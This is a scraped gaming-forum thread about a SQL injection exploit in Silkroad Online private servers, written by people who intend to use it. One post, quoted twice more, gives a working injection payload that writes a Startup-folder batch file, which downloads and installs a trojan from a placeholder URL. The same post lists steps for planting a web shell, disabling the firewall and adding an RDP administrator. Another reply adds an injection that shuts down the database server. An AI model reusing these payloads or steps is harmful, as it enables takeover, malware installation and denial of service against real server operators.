|
You last visited: Today at 00:02
Advertisement
[EXPLOIT] SQL Inject Inside SRO
Discussion on [EXPLOIT] SQL Inject Inside SRO within the SRO PServer Guides & Releases forum part of the SRO Private Server category.
09/19/2016, 08:53
|
#2
|
elite*gold: 10 
Join Date: May 2013
Posts: 1,984
Received Thanks: 1,148
|
no offense but just useless
|
|
|
|
09/19/2016, 09:03
|
#3
|
elite*gold: 32
Join Date: Dec 2015
Posts: 2,275
Received Thanks: 1,113
|
Quote:
Originally Posted by Jimmy*
no offense but just useless
|
Useless?
a'; SELECT 'bitsadmin.exe /transfer "bla" "http://download.url/bigtrojaner.exe" "C:\Users\Administrator\AppData\Roaming\Microsoft\ Windows\Start Menu\Programs\Startup\trojan.exe"' into outfile 'C:\Users\Administrator\AppData\Roaming\Microsoft\ Windows\Start Menu\Programs\Startup\autostart.bat';
- Now wait until they restart the Server and u got full Access of the Server.
- If they use GameServer and Webserver with same Server u can upload easy a shell and got access faster.
- You can create a bat file who deactivate the Firewall, adds a new Administrator with RemoteDesktop rights and after restart u can access throug RDP.
- You can change the whole Database, create new Admin Account ingame, change ur level, your power etc.
Yeh its useless.
|
|
|
|
|
09/19/2016, 09:56
|
#4
|
elite*gold: 0
Join Date: Apr 2009
Posts: 1,713
Received Thanks: 892
|
Quote:
Originally Posted by FlyffServices
Useless?
a'; SELECT 'bitsadmin.exe /transfer "bla" "http://download.url/bigtrojaner.exe" "C:\Users\Administrator\AppData\Roaming\Microsoft\ Windows\Start Menu\Programs\Startup\trojan.exe"' into outfile 'C:\Users\Administrator\AppData\Roaming\Microsoft\ Windows\Start Menu\Programs\Startup\autostart.bat';
- Now wait until they restart the Server and u got full Access of the Server.
- If they use GameServer and Webserver with same Server u can upload easy a shell and got access faster.
- You can create a bat file who deactivate the Firewall, adds a new Administrator with RemoteDesktop rights and after restart u can access throug RDP.
- You can change the whole Database, create new Admin Account ingame, change ur level, your power etc.
Yeh its useless.
|
Agreed, there's a lot of opportunities to do. Even though the OS server has some built in security features compared to the client version you can still do a lot.
|
|
|
|
|
09/19/2016, 10:04
|
#5
|
elite*gold: 0
Join Date: Jan 2009
Posts: 462
Received Thanks: 219
|
Quote:
Originally Posted by FlyffServices
Useless?
a'; SELECT 'bitsadmin.exe /transfer "bla" "http://download.url/bigtrojaner.exe" "C:\Users\Administrator\AppData\Roaming\Microsoft\ Windows\Start Menu\Programs\Startup\trojan.exe"' into outfile 'C:\Users\Administrator\AppData\Roaming\Microsoft\ Windows\Start Menu\Programs\Startup\autostart.bat';
- Now wait until they restart the Server and u got full Access of the Server.
- If they use GameServer and Webserver with same Server u can upload easy a shell and got access faster.
- You can create a bat file who deactivate the Firewall, adds a new Administrator with RemoteDesktop rights and after restart u can access throug RDP.
- You can change the whole Database, create new Admin Account ingame, change ur level, your power etc.
Yeh its useless.
|
I think he meant that the thread is useless since there already is one open about this exploit. 
Obviously the exploit isn't useless at all.
|
|
|
|
|
09/19/2016, 12:10
|
#6
|
elite*gold: 0
Join Date: Dec 2009
Posts: 452
Received Thanks: 73
|
dammm it was to keep in secret!
|
|
|
|
|
09/19/2016, 12:14
|
#7
|
elite*gold: 0
Join Date: Mar 2016
Posts: 68
Received Thanks: 37
|
use it to disable the sql
test' shutdown--
|
|
|
|
|
09/19/2016, 12:46
|
#8
|
elite*gold: 0
Join Date: Jan 2016
Posts: 105
Received Thanks: 46
|
why are you creating a thread while this was already discussed 2 weeks ago?
#attentionsnitch much?
|
|
|
|
|
09/19/2016, 13:03
|
#9
|
elite*gold: 0
Join Date: Jan 2012
Posts: 53
Received Thanks: 0
|
Quote:
Originally Posted by KralBoi
why are you creating a thread while this was already discussed 2 weeks ago?
#attentionsnitch much? |
Can you anti this ?
|
|
|
|
|
09/19/2016, 14:10
|
#10
|
elite*gold: 1
Join Date: Oct 2012
Posts: 8,423
Received Thanks: 3,239
|
#Closed
|
|
|
|
 |
Similar Threads
|
[Selling] ✔Protection Anti DDOS, Inject and Exploit 4 VSRO
07/03/2020 - Silkroad Online Trading - 6 Replies
Anti DDOS Attak >> 30 e*g
Anti Inject for SQL & Website >> 50 e*g
Anti Exploit Files (LATEST VER) >> 100 e*g
✔If you want buy add me on skype : albert.dev
#PUSH
|
Open Source Injector - Auto/Manual Inject, Verify Inject, Saves Settings
01/28/2013 - Combat Arms Hacks, Bots, Cheats & Exploits - 5 Replies
Open Source Injector - Auto/Manual Inject, Verify Inject, Saves Settings
Features:
-Auto Inject
-Customizable Delay
-Manual Inject
-Verify Inject
|
Check inside - an exploit that will fuck up every single of you
09/10/2012 - Silkroad Online Trading - 82 Replies
Hello everyone,
as you might have heard or not, there are few exploits(not just the dupe bug) that work everywhere, regardless of what kind of server files you use. We offer you a bugfix, however, you will not be told how it works(the bug itself), it's just a fix - nothing more. Basically, we can dupe any item we want, stackable or not, plus, we are also able to crash your server easily, not to mention the old-school "exchange bug" that allows you to "trade a sun" but the person will receive...
|
[Exploit]Inside the auction House/Bank
06/11/2011 - WoW Exploits, Hacks, Tools & Macros - 4 Replies
hey leute mal was neus von mir Ich zeige euch heute wie ihr hinter das gitter von der bank kommt und Hinter den npc´s in ah kommt Have fun Join Us :)
So Kommt man auch Unter ganz azeroth ;)
Inside the auction House
Inside the Bank
|
All times are GMT +2. The time now is 00:02.
|
|
![[EXPLOIT] SQL Inject Inside SRO](https://www.elitepvpers.com/forum/iconimages/sro-pserver-guides-releases/exploit-sql-inject-inside-sro_ltr.gif){kind=small}
[EXPLOIT] SQL Inject Inside SRO
